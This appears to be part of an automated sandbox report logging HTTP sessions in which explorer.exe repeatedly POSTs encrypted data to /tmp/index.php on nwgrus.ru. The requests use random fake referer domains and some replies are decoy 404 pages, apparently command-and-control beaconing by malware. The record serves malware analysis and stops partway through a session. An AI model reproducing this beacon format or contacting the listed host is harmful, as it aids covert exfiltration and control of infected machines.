                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.649917125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:47.828154087 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://tqcdafuvgwwyn.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 230
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:47.828191996 CEST230OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 40 09 de fa
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu@ Xkpd,rH@ob83`0}A64(T_{{>kK%Q,Js]WMYR}]0.B&w[
                                                                    Oct 14, 2024 06:02:49.335956097 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.649928125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:49.344197035 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://dujexgghfqd.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 353
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:49.344212055 CEST353OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 61 1d f1 e7
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuaU]V`gSm!c`NoIL CW*]?-Pv42itA3)Dqp.B\-m"4\ ,3CGc4Cb
                                                                    Oct 14, 2024 06:02:50.857863903 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:50 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.649939125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:50.866394997 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://qhntbwctbsxu.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 341
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:50.866425037 CEST341OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 30 06 a8 e4
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu0b[AZ!7f29,lGmpSmY1>%6IVl,R;{x;FKu7tKE~YyOhVqY;,?%
                                                                    Oct 14, 2024 06:02:52.382548094 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:52 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.649949125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:52.391983032 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://numxyybjlxnij.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 190
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:52.392024040 CEST190OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 4a 18 df e0
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuJ>sgliFLJ?M?UAW_@9Z[[CcI(LJQQEa_
                                                                    Oct 14, 2024 06:02:53.929398060 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:53 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.649960125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:53.950583935 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://qxvvlpafyplsfmh.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 247
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:53.950615883 CEST247OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 6e 5b da f5
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vun[%lQrey'P_r,CLVjYzTVszUWAY7%cc:EV9T/;7s/9abVQ@O]cARs
                                                                    Oct 14, 2024 06:02:55.571316004 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.649972125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:55.580125093 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://agcejdimcyykepgs.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 195
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:55.580125093 CEST195OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 33 00 cf e9
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu3MSkc]2~b>O`Tkxl\ZG269O^XG$l\^"G)
                                                                    Oct 14, 2024 06:02:57.199507952 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:56 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.649983125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:57.208039999 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://sbsqbgjbfyr.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 196
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:57.208080053 CEST196OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3b 5a cf fd
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu;Z^(ff^!*-,usJiiQ0?D,h\Et1*+1]h1U/Y}t%
                                                                    Oct 14, 2024 06:02:58.792424917 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:58 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.649994125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:58.800740957 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://kqejwgffiikyio.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 310
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:58.800764084 CEST310OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5c 18 bf e4
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu\LVrij^$dtaH\4,n-"^_2VPG'iHBJc"H0&i/E!,/xDy2Vp((%y
                                                                    Oct 14, 2024 06:03:00.281709909 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:59 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.649996125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:00.430532932 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://evinpfxalwnnmcek.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 213
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:00.430532932 CEST213OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 4b 37 fc 9a
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuK7H3^QW& z$y{)S3}{[. >7=hc7P,K<b!8|Im/FDH
                                                                    Oct 14, 2024 06:03:02.013729095 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:01 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.649997125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:02.021666050 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://vsgvwtqctrqw.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 117
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:02.021719933 CEST117OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 60 55 b0 e0
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu`U/rDUWHR~vqxq
                                                                    Oct 14, 2024 06:03:03.632520914 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.649999125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:03.640562057 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://aspcynlesjwhi.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 250
                                                                    Host: nwgrus.ru
